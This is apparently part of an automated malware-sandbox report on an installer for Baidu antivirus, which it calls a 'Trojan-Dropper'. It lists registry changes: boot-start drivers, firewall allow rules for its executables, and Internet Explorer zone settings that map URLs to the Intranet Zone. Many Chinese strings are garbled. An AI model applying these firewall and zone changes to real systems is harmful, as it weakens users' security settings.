[HKCR\Interface\{C7777CD6-0F43-49E4-B988-F62E3BA5130A}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{9A93865B-4314-47AE-8C4A-850748CCC6BF}\1.0\HELPDIR]
"(Default)" = ""

[HKLM\System\CurrentControlSet\Services\bd0002]
"DisplayName" = "bd0002"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Type" = "2"

[HKLM\System\CurrentControlSet\Services\bd0002]
"ErrorControl" = "0"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"RtpFlag" = "273"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Group" = "bddriver"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ImagePath" = "system32\DRIVERS\bd0001.sys"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™]
"DisplayIcon" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\app.ico"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Tag" = "3"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Path" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\explugin\npBaiduSDDetectPlug.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™]
"DisplayName" = "Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™1.8"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"VirusTime" = "2013.11.28 0110"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ErrorControl" = "0"

[HKCR\ieCommonPlugin.Implement.1]
"(Default)" = "Implement Class"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Description" = "bd0002"

[HKCR\AppID\ieCommonPlugin.DLL]
"AppID" = "{6B4447CA-C33E-4E65-914D-C7B346D73F80}"

[HKCR\Interface\{C7777CD6-0F43-49E4-B988-F62E3BA5130A}\TypeLib]
"(Default)" = "{9A93865B-4314-47AE-8C4A-850748CCC6BF}"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Type" = "1"

[HKLM\System\CurrentControlSet\Services\bd0003]
"ErrorControl" = "1"

[HKLM\System\CurrentControlSet\Services\bd0002]
"ImagePath" = "system32\DRIVERS\bd0002.sys"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\ieCommonPlugin.Implement]
"(Default)" = "Implement Class"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"INSTLANG" = "2052"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"ProductName" = "BaiduSd"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\ProgID]
"(Default)" = "ieCommonPlugin.Implement.1"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}]
"(Default)" = "Implement Class"

[HKCR\Interface\{C7777CD6-0F43-49E4-B988-F62E3BA5130A}]
"(Default)" = "IImplement"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Description" = "Baidusd detect NPAPI plugin"

[HKLM\System\CurrentControlSet\Control\ServiceGroupOrder]
"List" = "System Reserved, Boot Bus Extender, System Bus Extender, SCSI miniport, Port, Primary Disk, SCSI Class, SCSI CDROM Class, FSFilter Infrastructure, FSFilter System, FSFilter Bottom, FSFilter Copy Protection, FSFilter Security Enhancer, FSFilter Open File, FSFilter Physical Quota Management, FSFilter Encryption, FSFilter Compression, FSFilter HSM, FSFilter Cluster File System, FSFilter System Recovery, FSFilter Quota Management, FSFilter Content Screener, FSFilter Continuous Backup, FSFilter Replication, bddriver, FSFilter Anti-Virus, FSFilter Undelete, FSFilter Activity Monitor, FSFilter Top, Filter, Boot File System, Base, Pointer Port, Keyboard Port, Pointer Class, Keyboard Class, Video Init, Video, Video Save, File System, Event Log, Streams Drivers, NDIS Wrapper, COM Infrastructure, UIGroup, LocalValidation, PlugPlay, PNP_TDI, NDIS, TDI, NetBIOSGroup, ShellSvcGroup, SchedulerGroup, SpoolerGroup, AudioGroup, SmartCardGroup, NetworkProvider, RemoteValidation, NetDDEGroup, Parallel arbitrator, Extended Base, PCI Configuration, MS Transactions"

[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Version" = "1.0.0.1"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Group" = "bddriver"

[HKCR\ieCommonPlugin.Implement.1\CLSID]
"(Default)" = "{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}"

[HKCR\Interface\{C7777CD6-0F43-49E4-B988-F62E3BA5130A}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\System\CurrentControlSet\Services\bd0003\Instances\bd0003 Instance]
"Flags" = "0"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Description" = "bd0001"

[HKLM\System\CurrentControlSet\Services\bd0003]
"DisplayName" = "bd0003"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"SupplyID" = "30241"

[HKCR\CLSID\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\InprocServer32]
"ThreadingModel" = "Apartment"

The Trojan-Dropper adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduSd\1.8.0.1255]
"BaiduSdSvc.exe" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdSvc.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™Ã¦Å“ÂÃ¥Å Â¡Ã§Â¨â€¹Ã¥ÂºÂ"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduSd\1.8.0.1255]
"BaiduSdBugRpt.exe" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdBugRpt.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™BUGÃ¤Â¸Å Ã¦Å Â¥Ã§Â¨â€¹Ã¥ÂºÂ"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bd0003]
"Start" = "1"

The Trojan-Dropper adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduSd\1.8.0.1255]
"BaiduSdTray.exe" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdTray.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™Ã¦â€°ËœÃ§â€ºËœÃ§Â¨â€¹Ã¥ÂºÂ"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp]
"F30241_s_0523.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp\F30241_s_0523.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™Ã¥Â®â€°Ã¨Â£â€¦Ã§Â¨â€¹Ã¥ÂºÂ"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduSd\1.8.0.1255]
"BaiduSdSvc.exe" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdSvc.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™Ã¦Å“ÂÃ¥Å Â¡Ã§Â¨â€¹Ã¥ÂºÂ"

The Trojan-Dropper adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduSd\1.8.0.1255]
"BaiduSdUpdate.exe" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdUpdate.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™Ã¦â€ºÂ´Ã¦â€“Â°Ã§Â¨â€¹Ã¥ÂºÂ"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduSd\1.8.0.1255]
"BaiduSdTray.exe" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdTray.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™Ã¦â€°ËœÃ§â€ºËœÃ§Â¨â€¹Ã¥ÂºÂ"

The Trojan-Dropper adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduSd\1.8.0.1255]
"BaiduSd.exe" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSd.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™Ã¤Â¸Â»Ã§Â¨â€¹Ã¥ÂºÂ"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp]
"F30241_s_0523.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp\F30241_s_0523.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™Ã¥Â®â€°Ã¨Â£â€¦Ã§Â¨â€¹Ã¥ÂºÂ"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduSd\1.8.0.1255]
"BaiduSdBugRpt.exe" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdBugRpt.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™BUGÃ¤Â¸Å Ã¦Å Â¥Ã§Â¨â€¹Ã¥ÂºÂ"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduSd\1.8.0.1255]
"BaiduSdUpdate.exe" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdUpdate.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™Ã¦â€ºÂ´Ã¦â€“Â°Ã§Â¨â€¹Ã¥ÂºÂ"

The following service will be launched automatically at system boot up:

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Start" = "2"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bd0002]
"Start" = "1"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Start" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduSd\1.8.0.1255]
"BaiduSd.exe" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSd.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™Ã¤Â¸Â»Ã§Â¨â€¹Ã¥ÂºÂ"

The Trojan-Dropper deletes the following value(s) in system registry:

[HKLM\System\CurrentControlSet\Services\bd0003]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\bd0002]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\bd0001]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"DeleteFlag"

[HKLM\SOFTWARE\Baidu\BaiduSd]
"RtpFlag"

The process BaiduSdTray.exe:2920 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB EA F5 93 81 B4 1B 7A 5D 9A F9 B9 C3 47 A8 C7"

The process bddownloader.exe:3304 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\0\win32]
"(Default)" = "c:\program files\common files\baidu\bddownload\106\bddownloader.exe"

[HKCR\BDDownloadProxy.Downloader\CLSID]
"(Default)" = "{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\LocalServer32]
"(Default)" = "c:\program files\common files\baidu\bddownload\106\bddownloader.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\BDDownloadProxy.Downloader.1]
"(Default)" = "Downloader Class"

[HKCR\BDDownloadProxy.Downloader.1\CLSID]
"(Default)" = "{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\BDDownloadProxy.Downloader]
"(Default)" = "Downloader Class"

[HKCR\AppID\{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}]
"(Default)" = "DownloadProxy"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}]
"(Default)" = "Downloader Class"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\ProgID]
"(Default)" = "BDDownloadProxy.Downloader.1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"netsh.exe" = "Network Command Shell"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"Version" = "1.0"

[HKCR\AppID\DownloadProxy.EXE]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\HELPDIR]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 C7 73 DB 7F A3 B0 B5 B4 93 FD C1 3C EF 8C 1E"

[HKCR\BDDownloadProxy.Downloader\CurVer]
"(Default)" = "BDDownloadProxy.Downloader.1"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}]
"(Default)" = "_IDownloaderEvents"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0]
"(Default)" = "DownloadProxy 1.0 Type Library"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\VersionIndependentProgID]
"(Default)" = "BDDownloadProxy.Downloader"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"

The Trojan-Dropper modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Dropper modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan-Dropper modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process regsvr32.exe:3556 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 39 21 32 DD EB F6 0A 18 10 49 8D DF 84 EC 81"

[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}]
"(Default)" = "IDownloader_2"

[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"ThreadingModel" = "Both"

[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"

[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"(Default)" = "c:\program files\common files\baidu\bddownload\106\bdcomproxy.dll"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"

[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\NumMethods]
"(Default)" = "6"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\NumMethods]
"(Default)" = "15"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"

The process BaiduSdSvc.exe:2716 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 91 35 D2 D9 80 24 E3 49 FF 9B 4A B1 48 8F C3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process BaiduSdSvc.exe:2612 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 A0 72 14 5E 6D C5 97 45 20 23 18 97 58 C2 8F"

The process netsh.exe:3540 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B 03 AF 81 BC 2C 93 85 3A A6 C2 A1 F1 23 43 13"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan-Dropper adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\Common Files\Baidu\BDDownload\106]
"bddownloader.exe" = "%Program Files%\Common Files\Baidu\BDDownload\106\bddownloader.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã©Â«ËœÃ©â‚¬Å¸Ã¤Â¸â€¹Ã¨Â½Â½Ã¥â„¢Â¨"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Common Files\Baidu\BDDownload\106]
"bddownloader.exe" = "%Program Files%\Common Files\Baidu\BDDownload\106\bddownloader.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã©Â«ËœÃ©â‚¬Å¸Ã¤Â¸â€¹Ã¨Â½Â½Ã¥â„¢Â¨"

The process BDKVWsc.exe:2976 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 8B A5 92 52 F0 A5 19 3C CE 4F F8 A3 20 E7 45"

The process RegSvr32.exe:3024 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKCR\TypeLib\{45D1EEF3-7713-48FA-B7A5-B77229C7D330}\1.0]
"(Default)" = "BDShellExt 1.0 Type Library"

[HKCR\BDShellExt.BDShellExtMenu\CurVer]
"(Default)" = "BDShellExt.BDShellExtMenu.1"

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\NumMethods]
"(Default)" = "3"

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}]
"(Default)" = "IBDShellExtMenu"

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{45D1EEF3-7713-48FA-B7A5-B77229C7D330}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\InProcServer32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt.dll"

[HKCR\BDShellExt.BDShellExtMenu.1]
"(Default)" = "BDShellExtMenu Class"

[HKCR\BDShellExt.BDShellExtMenu]
"(Default)" = "BDShellExtMenu Class"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}\InprocServer32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt.dll"

[HKCR\BDShellExt.BDShellExtMenu.1\CLSID]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\lnkfile\shellex\ContextMenuHandlers\BDShellExt]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\AppID\BDShellExt.DLL]
"AppID" = "{FBE0E29B-01DB-4876-B147-46F5AABA6823}"

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\TypeLib]
"Version" = "1.0"
